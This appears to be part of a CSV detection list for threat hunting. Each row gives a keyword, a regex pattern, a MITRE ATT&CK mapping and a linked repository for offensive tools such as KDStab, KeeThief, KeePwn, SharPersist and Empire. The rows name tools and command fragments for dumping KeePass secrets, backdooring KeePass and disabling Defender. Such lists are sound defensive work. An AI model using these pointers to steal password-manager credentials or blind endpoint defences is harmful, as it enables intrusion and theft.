"*kdstab * /LIST*",".{0,1000}kdstab\s.{0,1000}\s\/LIST.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50253"
"*kdstab * /NAME*",".{0,1000}kdstab\s.{0,1000}\s\/NAME.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50254"
"*kdstab * /PID*",".{0,1000}kdstab\s.{0,1000}\s\/PID.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50255"
"*kdstab * /SERVICE*",".{0,1000}kdstab\s.{0,1000}\s\/SERVICE.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50256"
"*kdstab * /STRIP*",".{0,1000}kdstab\s.{0,1000}\s\/STRIP.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50257"
"*kdstab * /UNLOAD*",".{0,1000}kdstab\s.{0,1000}\s\/UNLOAD.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50258"
"*kdstab.cna*",".{0,1000}kdstab\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","N/A","10","10","167","37","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z","50259"
"*KeeFarceReborn.*",".{0,1000}KeeFarceReborn\..{0,1000}","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Metro-Holografix/DInjector","1","1","N/A","private github repo","8","","N/A","","","","50260"
"*keep monitoring named pipe activities until enter is pressed*",".{0,1000}keep\smonitoring\snamed\spipe\sactivities\suntil\senter\sis\spressed.{0,1000}","offensive_tool_keyword","NamedPipeMaster","a tool used to analyze  monitor and interact with named pipes - allows dll injection and impersonation","T1055.001 - T1134.001 - T1010 - T1550.002","TA0007 - TA0008 - TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/zeze-zeze/NamedPipeMaster","1","0","N/A","N/A","9","2","161","15","2024-10-27T05:24:11Z","2024-08-23T02:03:44Z","50261"
"*KeePass config file is backdoored already*",".{0,1000}KeePass\sconfig\sfile\sis\sbackdoored\salready.{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","50262"
"*keepass_common_plug.*",".{0,1000}keepass_common_plug\..{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50263"
"*keepass_discover.py*",".{0,1000}keepass_discover\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Credential Access","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","50264"
"*keepass2john *.kdbx*",".{0,1000}keepass2john\s.{0,1000}\.kdbx.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","50265"
"*KeePassBackdoor.*",".{0,1000}KeePassBackdoor\..{0,1000}","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","N/A","10","10","1460","257","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z","50266"
"*KeePassConfig.ps1*",".{0,1000}KeePassConfig\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50267"
"*KeePassConfig.ps1*",".{0,1000}KeePassConfig\.ps1.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","50268"
"*-KeePassConfigTrigger*",".{0,1000}\-KeePassConfigTrigger.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","50269"
"*KeePassHax.dll*",".{0,1000}KeePassHax\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","50270"
"*KeePassLib.Keys.KcpPassword*",".{0,1000}KeePassLib\.Keys\.KcpPassword.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","0","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","50271"
"*keepass-password-dumper*",".{0,1000}keepass\-password\-dumper.{0,1000}","offensive_tool_keyword","keepass-password-dumper","KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. just a memory dump","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/vdohney/keepass-password-dumper","1","1","N/A","N/A","N/A","7","639","59","2023-08-17T19:26:55Z","2023-05-01T17:08:55Z","50272"
"*keepass-password-dumper*",".{0,1000}keepass\-password\-dumper.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50273"
"*keepassxcfox.dll*",".{0,1000}keepassxcfox\.dll.{0,1000}","offensive_tool_keyword","ThievingFox","collection of post-exploitation tools to gather credentials from various password managers","T1555 - T1003 - T1056 - T1070","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Slowerzs/ThievingFox","1","1","N/A","N/A","10","6","535","65","2024-03-28T19:58:03Z","2024-01-20T23:22:52Z","50274"
"*KeePwn --*",".{0,1000}KeePwn\s\-\-.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50275"
"*KeePwn parse_dump *",".{0,1000}KeePwn\sparse_dump\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50276"
"*KeePwn plugin *",".{0,1000}KeePwn\splugin\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50277"
"*KeePwn plugin add -u * -p * -d * -t *",".{0,1000}KeePwn\splugin\sadd\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-d\s.{0,1000}\s\-t\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50278"
"*KeePwn plugin check -u *",".{0,1000}KeePwn\splugin\scheck\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","50279"
"*KeePwn trigger *",".{0,1000}KeePwn\strigger\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50280"
"*KeePwn v* - by Julien BEDEL*",".{0,1000}KeePwn\sv.{0,1000}\s\-\sby\sJulien\sBEDEL.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50281"
"*keepwn.__main__:main*",".{0,1000}keepwn\.__main__\:main.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50282"
"*keepwn.core.*",".{0,1000}keepwn\.core\..{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50283"
"*keepwn.core.parse_dump*",".{0,1000}keepwn\.core\.parse_dump.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50284"
"*keepwn.core.plugin*",".{0,1000}keepwn\.core\.plugin.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50285"
"*keepwn.core.search*",".{0,1000}keepwn\.core\.search.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50286"
"*keepwn.core.trigger*",".{0,1000}keepwn\.core\.trigger.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50287"
"*KeePwn.py *",".{0,1000}KeePwn\.py\s.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50288"
"*keepwn.utils.*",".{0,1000}keepwn\.utils\..{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","0","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50289"
"*KeePwn-main.zip*",".{0,1000}KeePwn\-main\.zip.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","N/A","10","5","486","47","2024-12-12T12:47:07Z","2023-01-27T13:59:38Z","50290"
